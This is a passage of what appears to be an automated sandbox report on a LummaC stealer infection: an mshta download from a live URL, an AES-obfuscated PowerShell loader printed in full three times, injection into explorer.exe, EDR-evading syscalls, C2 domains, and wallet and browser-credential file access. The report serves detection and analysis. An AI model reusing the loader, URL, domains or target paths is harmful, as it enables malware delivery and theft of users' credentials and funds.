                      Source: C:\Users\user\iScrPaint.exeCode function: 16_2_6C06B4E4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_6C06B4E4
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeCode function: 17_2_6B6FB4E4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_6B6FB4E4

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 104.21.16.1 443
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Users\user\iScrPaint.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2E
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeNtQuerySystemInformation: Direct from: 0x6B968370
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeNtSetInformationThread: Direct from: 0x6B254C69
                      Source: C:\Users\user\iScrPaint.exeNtQuerySystemInformation: Direct from: 0x6C2D8370
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeNtProtectVirtualMemory: Direct from: 0x6BA12B9A
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 940 base: CE79C0 value: 55
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 940 base: BCB008 value: 00
                      LummaC encrypted strings found
                      Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                      Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                      Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                      Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                      Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                      Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                      Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                      Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                      Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: securesways.click
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CE79C0
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: BCB008
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplieJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0A23752FE985FC9FD64BB3465A7D797346AC4EB8E6FA6258E6C499D05779F61BCEC012DC00DA9FBBDBA937EA0E7F819DA30D6226959EA7519380176563334C188B79BB6DA507B41F9479C4ECD6FCFBEAC89945BB235377DAFFC2B2E0422A373DF64E2DDF535FA76F2F6195EDE596B0317D4804786027E0B623BF5D1D584D6065AFA5E42CE963A4614903389786638A13BFEAD5BCA6D5632E96589B3891210B8EE6577C079CDE437E55F527D851A6E360A415EC287B6A355E4474FF7AFFC5E1C2C84DF35ED4839335D434B4C6EB3E0E9BE4C9BB60244693023805DB66378A17C37A948E7A51FC5D87A0BC7A2EB7D9F4DA156623A9183F872D54778974ADE95F381DE2AAE416E6172BAAEF2320C24A65879A0D52DAD6FAF25F6401BA3456E99B3F0C534868BB75527DBE10715FC36A8BB44C9977366FA95D0EE4ADCEA23B71915BE1B53B87D12D50B68707404AEFB59E47D774511900EB4509210E15424197DEDADBF6270B4BBDB7CA28491995A87F9A3CB9FC232BFB8DD6FC010D911FB9A85D8D423DDB3D610F88D031C25B6AAAA7F6F7E86773457EBF9E1627E87A801B0A5F69AB28A75F7A7684E8E08FBD622656F168B01419A0F9142A0B1E96F0A4019AC5AE6015EC400D4957D3658DA911E88F29E506EE2B315649007D4AD02B9AC42C6536DF21C03BA8A4513A3E4C547246C363F281F230A226EA7FEAF52932752BB3E5AC1DC92E54264FDEEC820E460FF5BF265D1D5A1A7357FCC07BBCB15D0DFC7AFB18D7D8ED8D11813ABE2565BCF731F20AB1D1A8D393D9E8CCA5D1AC1297CE33468EA8FEA4B579AC4DBD4338C86D8207ED1485FEA355E9CE074FCF496ED4D2CEAAFFBF6FE7CD314D30A0CF1CA039AA1EDC0440C8C082BBC07A3458CB8039EB599B8C59B1EEAE0186F371C0B858E495C81E310381A10B00AA941D672D8F0FDD94D6BCF6344EA8D3CF3BE07A0F29AD3BC172F5FEC0541A77B8007A0BA0BA5CD14298C1D74F200A847C8A8586EDAF36D5C8040A3D244982700F4E595857B0619867A217F8FEEAE91B337EF244871580E0CEC7EC35A6E5C5356234C447A13CF21B5B3DCAF3D5A547E32FB972AE6DDFDA3C0C7198771CA4D327A77575F82B079A6BCE811999F9AA1DBCBBA2938F34BE32EADA581AB69F8BC451713EC828E6D3D62F721EB09FC154CB3D93C7D958C9F426B244650B32A5CDBBF9F9512F07496C1DA9AED38876CC794D2073594342E5E9B7E851A0C3AE91198802506F7FE48D8430BC5E4C06506680E3D7613B81E01A16CFD524741269AADD19A2E1CF4A2BA75CF3B27D0B2A2C19729DEF1BAA021F00A33B6CBCB211F0D14BB0D6FDB116AC0D76B7EB14848CA0F71871993F73D63256F5FA94A2FAC681186693CF2F3776C5B0D8C1FD35E87EF9FD6CC7633C06DD2ECB5AE82A9FDCE2BB6DA99DB57E009DCDE40871998B8FDCCD59411335EB4B916E81193A27706177634DA7F7994FB1DD6A944AC9DAECDCA2D45C883E465AC6BC3613FFFE963C92F84B60C9183D522E49857344D0E0171A1B4AF1FBF07286E4C23EC443EFA2CAAB4BEBF411FBE1E4799292B05548811AD68EC505467241E859FA3DD71727E100C7C6F8664659725043526B66756D7661597247';function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\TCUINOVJ.exe "C:\Users\user\AppData\Roaming\TCUINOVJ.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeProcess created: C:\Users\user\iScrPaint.exe "C:\Users\user\iScrPaint.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '0a4f04b664291d3c891ee57cf9aa6e0a23752fe985fc9fd64bb3465a7d797346ac4eb8e6fa6258e6c499d05779f61bcec012dc00da9fbbdba937ea0e7f819da30d6226959ea7519380176563334c188b79bb6da507b41f9479c4ecd6fcfbeac89945bb235377daffc2b2e0422a373df64e2ddf535fa76f2f6195ede596b0317d4804786027e0b623bf5d1d584d6065afa5e42ce963a4614903389786638a13bfead5bca6d5632e96589b3891210b8ee6577c079cde437e55f527d851a6e360a415ec287b6a355e4474ff7affc5e1c2c84df35ed4839335d434b4c6eb3e0e9be4c9bb60244693023805db66378a17c37a948e7a51fc5d87a0bc7a2eb7d9f4da156623a9183f872d54778974ade95f381de2aae416e6172baaef2320c24a65879a0d52dad6faf25f6401ba3456e99b3f0c534868bb75527dbe10715fc36a8bb44c9977366fa95d0ee4adcea23b71915be1b53b87d12d50b68707404aefb59e47d774511900eb4509210e15424197dedadbf6270b4bbdb7ca28491995a87f9a3cb9fc232bfb8dd6fc010d911fb9a85d8d423ddb3d610f88d031c25b6aaaa7f6f7e86773457ebf9e1627e87a801b0a5f69ab28a75f7a7684e8e08fbd622656f168b01419a0f9142a0b1e96f0a4019ac5ae6015ec400d4957d3658da911e88f29e506ee2b315649007d4ad02b9ac42c6536df21c03ba8a4513a3e4c547246c363f281f230a226ea7feaf52932752bb3e5ac1dc92e54264fdeec820e460ff5bf265d1d5a1a7357fcc07bbcb15d0dfc7afb18d7d8ed8d11813abe2565bcf731f20ab1d1a8d393d9e8cca5d1ac1297ce33468ea8fea4b579ac4dbd4338c86d8207ed1485fea355e9ce074fcf496ed4d2ceaaffbf6fe7cd314d30a0cf1ca039aa1edc0440c8c082bbc07a3458cb8039eb599b8c59b1eeae0186f371c0b858e495c81e310381a10b00aa941d672d8f0fdd94d6bcf6344ea8d3cf3be07a0f29ad3bc172f5fec0541a77b8007a0ba0ba5cd14298c1d74f200a847c8a8586edaf36d5c8040a3d244982700f4e595857b0619867a217f8feeae91b337ef244871580e0cec7ec35a6e5c5356234c447a13cf21b5b3dcaf3d5a547e32fb972ae6ddfda3c0c7198771ca4d327a77575f82b079a6bce811999f9aa1dbcbba2938f34be32eada581ab69f8bc451713ec828e6d3d62f721eb09fc154cb3d93c7d958c9f426b244650b32a5cdbbf9f9512f07496c1da9aed38876cc794d2073594342e5e9b7e851a0c3ae91198802506f7fe48d8430bc5e4c06506680e3d7613b81e01a16cfd524741269aadd19a2e1cf4a2ba75cf3b27d0b2a2c19729def1baa021f00a33b6cbcb211f0d14bb0d6fdb116ac0d76b7eb14848ca0f71871993f73d63256f5fa94a2fac681186693cf2f3776c5b0d8c1fd35e87ef9fd6cc7633c06dd2ecb5ae82a9fdce2bb6da99db57e009dcde40871998b8fdccd59411335eb4b916e81193a27706177634da7f7994fb1dd6a944ac9daecdca2d45c883e465ac6bc3613fffe963c92f84b60c9183d522e49857344d0e0171a1b4af1fbf07286e4c23ec443efa2caab4bebf411fbe1e4799292b05548811ad68ec505467241e859fa3dd71727e100c7c6f8664659725043526b66756d7661597247';function vyt ($ffwwz){return -split ($ffwwz -replace '..', '0x$& ')};$dhspomnm = vyt($ddg.substring(0, 2304));$pzg = [system.security.cryptography.aes]::create();$pzg.key = vyt($ddg.substring(2304));$pzg.iv = new-object byte[] 16;$dsnuqar = $pzg.createdecryptor();$vwahlx = [system.string]::new($dsnuqar.transformfinalblock($dhspomnm, 0,$dhspomnm.length)); sal fd $vwahlx.substring(3,3); fd $vwahlx.substring(6)
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '0a4f04b664291d3c891ee57cf9aa6e0a23752fe985fc9fd64bb3465a7d797346ac4eb8e6fa6258e6c499d05779f61bcec012dc00da9fbbdba937ea0e7f819da30d6226959ea7519380176563334c188b79bb6da507b41f9479c4ecd6fcfbeac89945bb235377daffc2b2e0422a373df64e2ddf535fa76f2f6195ede596b0317d4804786027e0b623bf5d1d584d6065afa5e42ce963a4614903389786638a13bfead5bca6d5632e96589b3891210b8ee6577c079cde437e55f527d851a6e360a415ec287b6a355e4474ff7affc5e1c2c84df35ed4839335d434b4c6eb3e0e9be4c9bb60244693023805db66378a17c37a948e7a51fc5d87a0bc7a2eb7d9f4da156623a9183f872d54778974ade95f381de2aae416e6172baaef2320c24a65879a0d52dad6faf25f6401ba3456e99b3f0c534868bb75527dbe10715fc36a8bb44c9977366fa95d0ee4adcea23b71915be1b53b87d12d50b68707404aefb59e47d774511900eb4509210e15424197dedadbf6270b4bbdb7ca28491995a87f9a3cb9fc232bfb8dd6fc010d911fb9a85d8d423ddb3d610f88d031c25b6aaaa7f6f7e86773457ebf9e1627e87a801b0a5f69ab28a75f7a7684e8e08fbd622656f168b01419a0f9142a0b1e96f0a4019ac5ae6015ec400d4957d3658da911e88f29e506ee2b315649007d4ad02b9ac42c6536df21c03ba8a4513a3e4c547246c363f281f230a226ea7feaf52932752bb3e5ac1dc92e54264fdeec820e460ff5bf265d1d5a1a7357fcc07bbcb15d0dfc7afb18d7d8ed8d11813abe2565bcf731f20ab1d1a8d393d9e8cca5d1ac1297ce33468ea8fea4b579ac4dbd4338c86d8207ed1485fea355e9ce074fcf496ed4d2ceaaffbf6fe7cd314d30a0cf1ca039aa1edc0440c8c082bbc07a3458cb8039eb599b8c59b1eeae0186f371c0b858e495c81e310381a10b00aa941d672d8f0fdd94d6bcf6344ea8d3cf3be07a0f29ad3bc172f5fec0541a77b8007a0ba0ba5cd14298c1d74f200a847c8a8586edaf36d5c8040a3d244982700f4e595857b0619867a217f8feeae91b337ef244871580e0cec7ec35a6e5c5356234c447a13cf21b5b3dcaf3d5a547e32fb972ae6ddfda3c0c7198771ca4d327a77575f82b079a6bce811999f9aa1dbcbba2938f34be32eada581ab69f8bc451713ec828e6d3d62f721eb09fc154cb3d93c7d958c9f426b244650b32a5cdbbf9f9512f07496c1da9aed38876cc794d2073594342e5e9b7e851a0c3ae91198802506f7fe48d8430bc5e4c06506680e3d7613b81e01a16cfd524741269aadd19a2e1cf4a2ba75cf3b27d0b2a2c19729def1baa021f00a33b6cbcb211f0d14bb0d6fdb116ac0d76b7eb14848ca0f71871993f73d63256f5fa94a2fac681186693cf2f3776c5b0d8c1fd35e87ef9fd6cc7633c06dd2ecb5ae82a9fdce2bb6da99db57e009dcde40871998b8fdccd59411335eb4b916e81193a27706177634da7f7994fb1dd6a944ac9daecdca2d45c883e465ac6bc3613fffe963c92f84b60c9183d522e49857344d0e0171a1b4af1fbf07286e4c23ec443efa2caab4bebf411fbe1e4799292b05548811ad68ec505467241e859fa3dd71727e100c7c6f8664659725043526b66756d7661597247';function vyt ($ffwwz){return -split ($ffwwz -replace '..', '0x$& ')};$dhspomnm = vyt($ddg.substring(0, 2304));$pzg = [system.security.cryptography.aes]::create();$pzg.key = vyt($ddg.substring(2304));$pzg.iv = new-object byte[] 16;$dsnuqar = $pzg.createdecryptor();$vwahlx = [system.string]::new($dsnuqar.transformfinalblock($dhspomnm, 0,$dhspomnm.length)); sal fd $vwahlx.substring(3,3); fd $vwahlx.substring(6)Jump to behavior
                      Source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmpBinary or memory string: ProgmanU
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_0040D72E cpuid 15_2_0040D72E
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,15_2_00401F9D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,15_2_00401626
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,15_2_00404FAA
                      Source: C:\Windows\SysWOW64\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 940, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                      Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                      Source: explorer.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                      Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                      Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: explorer.exeString found in binary or memory: ExodusWe
                      Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                      Source: explorer.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                      Source: explorer.exe, 00000015.00000003.2738829020.0000000003110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
